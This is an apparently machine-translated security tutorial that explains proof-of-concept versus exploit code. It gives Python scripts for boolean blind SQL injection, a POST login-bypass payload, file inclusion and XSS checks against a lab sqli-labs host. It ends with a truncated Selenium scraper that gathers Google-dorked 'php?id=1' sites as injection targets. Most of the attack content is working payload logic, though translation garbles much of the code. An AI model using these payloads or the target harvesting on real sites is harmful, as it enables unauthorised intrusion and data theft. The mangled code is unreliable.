Shulou(Shulou.com)06/01 Report--

This article introduces the relevant knowledge of "what is the difference between POC and EXP of Python". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

0x00 POC concept

POC (Proof of Concept), literally translated as "proof of concept", the authoritative definition of Baidu encyclopedia is as follows: "proof of concept is the test code that confirms the authenticity of the released vulnerability." Poc requirements: certainty, ability to verify the real existence of vulnerabilities.

It may be just a small piece of code, and the function is relatively simple, as long as it can be used to verify the real existence of a certain vulnerability or class of vulnerabilities. The threshold for writing POC is not very high, and the key lies in the understanding of the vulnerability itself.

0x01 POC authoring framework

POC framework can manage and schedule a large number of POC, provides a unified programming specification and interface, and is a good helper for writing POC. We just need to write POC according to the format defined by the framework. Then run it in the framework.

1. Pocsuite

Pocsuite framework is now known as a common vulnerability verification framework for the Chuangyu Seebug platform. POC is written in Python. Can submit POC for kb, kb can be used to exchange cash, earn some pocket money is quite good. Veteran drivers may have heard of Sebug, the predecessor of Seebug, which changed its name to Seebug after Sebug acquired another excellent framework, Beebeeto, in 2016.

2. Tangscan

Tangscan (Tang Dynasty Scanner) is the official framework of the wooyun community, using Python to write POC. You can submit POC for dumplings and participate in cash dividends.

3. Bugscan

Bugscan is the official framework of the four-leaf clover, and POC is written in Python. Submit the POC plug-in to get the rank reward, convertible in kind reward, the prize is quite rich.

The difference between 0x02 POC and EXP

POC can be seen as a piece of validation code, like evidence of the authenticity of the vulnerability.

EXP (Exploit): literally translated as "vulnerability exploitation", to put it simply, the value of vulnerability exploitation can be realized through EXP. For example, if a system has SQL injection vulnerabilities, we can write EXP to extract database version information and so on.

But sometimes it's not easy to tell the two apart. We can also add Exploit code to POC, as many open source POC frameworks do, such as the ones we will talk about below. We can think of it this way: if you have POC, you may not have EXP, but if you have EXP, you must have POC. The first half means that there is a poc but not all of them can be used to complete an effective attack, so there is not necessarily an exp. The second half means that there must be exp if there are vulnerabilities that can be used for effective attacks.

0x03 POC, EXP blind injection exercise-sql-labs-master

Judge the mode of injection closure

''

Boolean blind note: http://192.168.30.164/sqli/Less-5/

Determine whether there is sql injection with closed single quotation marks

Written by poc: yes or no results

''

Import requests

Def verify (url):

Payload1 = "? id=1' and 1-- +"

Payload2 = "? id=1' and 1, 2-- +"

Resp1 = requests.get (url+payload1)

Resp2 = requests.get (url+payload2)

Text1 = resp1.text

Text2 = resp2.text

Print (text2)

If ('You are in' in text1) and (' You are in' not in text2):

Print (sql injection with single quote closure in url,': (blind injection)')

Else:

Print (there is no single quote closed sql injection (blind injection) in url,':)

Verify ('http://192.168.30.164/sqli/Less-5/')

two。 Judge database length = "the longest database name is 64, the longest data table name is 64, the longest field name is 64, the longest name is 64.

Import requests

Def verify (url):

For i in range (1Jing 20)

Payload1 = "? id=1' and length (database ()) = {}-+" .format (I)

Resp1 = requests.get (url+payload1)

Text1 = resp1.text

If 'You are in' in text1:

Print ('database length is:% slots% I)

Break

If _ _ name__=='__main__':

Url = "http://192.168.30.164/sqli/Less-5/"

Verify (url)

3. Determine the database name

''

Exp's little exercise.

Boolean blind note: http://192.168.30.164/sqli/Less-5/

You are in

''

Import requests

Def verify (url):

# length = []

For i in range (1d8):

List = 'abcdefghijklmnopqrstuvwxyz'

For k in range (1Jing 26):

J = list [k]

# payload1 = "? id=1' and length (database ()) = {}-+" .format (I)

Payload1 = "? id=1' and substr (database (), {}, 1) ='{}'- +" .format (iMagnej)

Resp1 = requests.get (url+payload1)

Text1 = resp1.text

If 'You are in' in text1:

Print ('database is:% slots% j)

Break

If _ _ name__=='__main__':

Url = "http://192.168.30.164/sqli/Less-5/"

Verify (url)

# j = input ('Please enter the level you want to play:')

# verify ('http://192.168.30.164/sqli/Less-{}/'.format(j))

# verify ('http://192.168.30.164/sqli/Less-5/')

Posttype exercise of 0x04 POC-sql-labs-master

For posttype SQL injection, you need to obtain the value passed in the form on the basis of obtaining its url, which can be obtained by burpsuite to grab the packet for analysis. Upload the passed value into the request as a key-value pair in python.

''

Post poc

Http://192.168.30.164/sqli/Less-11/

''

Import requests

Url = "http://192.168.30.164/sqli/Less-11/"

Payloads = "admin' or'1 #"

Response = requests.post (url,data= {'uname':payloads,'passwd':123})

Html = response.text

Print (html)

If 'Your Login name' in html:

Print ('Post injection')

0x05 POC's file contains exercises

The file contains:

The local file contains = "http://127.0.0.1/1/lfi.php?file=phpinfo.txt"

The remote file contains = "allow_url_include needs to be enabled, and the default is off. Remote files contain file=http:// remote file addresses

"

The file contains poc

Http://127.0.0.1/1/lfi.php?file=phpinfo.txt

"

Import requests

Def verify (url):

Payload ='? file=phpinfo.txt'

Reaponse = requests.get (url+payload)

Html_str = reaponse.text

If 'PHP Version' in html_str:

Print ('local file contains')

Else:

Print ('does not exist')

If _ _ name__ = ='_ _ main__':

Verify (url= "http://127.0.0.1/1/lfi.php")

XSS exercises for 0x06 POC

XSS is the second largest vulnerability besides SQL injection. The categories are: reflective XSS, storage XSS, and Dom XSS.

What can XSS do:

Worms = "handsome batch

Get cookie

Obtaining the real ip:javascript of the attacker does not have this function by itself.

Identify the software installed by the user

XSS fishing

Screenshot

Keyboard recording

Access the browser's access record

Intranet scanning

"

Xss cross-site scripting attack

Pop window

Http://127.0.0.1/1/xss.php?title=%3C/title%3E%3Cscript%3Ealert(123)%3C/script%3E

"

Import requests

Import re

Def POC ():

Response = requests.get ('http://127.0.0.1/1/xss.php?title=alert(123)')

Res = response.text

If re.search ('alert\ (123\)', res):

Return True

Else:

Return False

If _ _ name__ = ='_ _ main__':

Print (POC ())

0x07 Google Grammar: search for sites that may contain injection points through inurl=php?id=1. Google Grammar

Site: domain names that limit the scope of your search.

Inurl: used to search for URL contained on a web page. This syntax is useful for finding search on a web page, help, etc.

Intext: search only the text contained in the section of the web page (that is, ignore the title, URL, etc.)

Intitle: check pages that contain keywords, which are generally used for social workers' webshell passwords

Filetype: search for the suffix or extension of a file

Intitle: limit the title of the page you search.

Link: you can get a list of all the pages that contain a specified URL.

2.google syntax simulation click

"

Selenium crawler

1. Obtain the url of php?id=1 d in batches through google syntax

2.url saved to file: urls.txt

"

From selenium import webdriver

Import time

Import re

# # setting headless

# chrome_option =

Dirver = webdriver.Chrome (ringing G:\ python\ file\ chromedriver.exe') # create Google browser object and open Google browser

Dirver.get ('https://www.google.com/search?q=inurl:php?id=1')

For i in range (10):

Time.sleep (1.5)

Dirver.execute_script ('window.scrollTo (0document. Body.scrollHeight)')

Html_str = dirver.page_source # get the source code

# data parsing

# test = dirver.find_element_by_xpath ('/ / a [@ id= "pnnext"] / span [2]')

Pattern = re.compile ('

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.